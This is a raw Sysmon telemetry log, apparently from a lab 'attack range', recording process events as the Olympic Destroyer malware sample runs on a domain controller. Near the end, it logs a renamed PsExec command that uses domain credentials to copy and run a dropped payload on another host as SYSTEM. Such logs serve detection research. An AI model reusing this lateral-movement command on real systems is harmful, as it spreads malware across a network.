10:56:47.230{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217676Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.230{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217675Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.230{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217674Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.230{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217673Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.230{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217672Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.230{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217671Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.230{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-12EF-6216-8304-000000003902}3532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217670Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.230{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-12EF-6216-8304-000000003902}3532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217669Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:56:47.230{4F8D34B0-12EF-6216-8304-000000003902}3532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000291223Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.981{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EE-6216-8405-000000003802}5620C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291222Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.981{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EE-6216-8405-000000003802}5620C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291221Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.966{C8EA50B7-12EE-6216-8405-000000003802}5620596C:\Windows\system32\conhost.exe{C8EA50B7-12EE-6216-8105-000000003802}5608C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000291220Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.965{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8438909548473E3DB4E91142887E412A,SHA256=D5CAC05332BECFC14C22E11591E8719FC7B70B780D8DA4FF6C947EF2FA1242C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291219Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.965{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=0413A38EC4E0075C9324189D18F6F7C4,SHA256=61A8B5E553C4D6C2B4D46F85A78D08DFD415B44DCED10828AF910061DAD35D87,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291218Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.963{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12EE-6216-8505-000000003802}4820C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291217Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.944{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291216Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.944{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291215Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.944{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291214Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.944{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291213Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.944{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EE-6216-8505-000000003802}4820C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291212Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:46.928{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12EE-6216-8405-000000003802}5620C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 23542300x8000000000000000291427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.999{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=932AB61C44EF9B9CD3BC0195AED863ED,SHA256=427C7B09FE1412C904DAA4DA3AD161D386776FAB44D5DEDE04CEC122C415A96A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000291426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.983{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B585F37B22E95AF0D650987D7CD11EF7,SHA256=A4D412601D7F295B4325CD22A7C1A7F5B4EFBD3605C2C186DB0091AB84B57F6D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000291425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.968{C8EA50B7-F2AA-6215-B100-000000003802}22443360C:\Windows\system32\csrss.exe{C8EA50B7-12F0-6216-9B05-000000003802}5188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000291424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.968{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.968{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.968{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.968{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000291420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.968{C8EA50B7-12E6-6216-4B05-000000003802}67926932C:\Temp\olympic_destroyer.exe{C8EA50B7-12F0-6216-9B05-000000003802}5188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000291419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:48.968{C8EA50B7-12F0-6216-9B05-000000003802}5188C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-255.eu-central-1.compute.internal -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000291418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 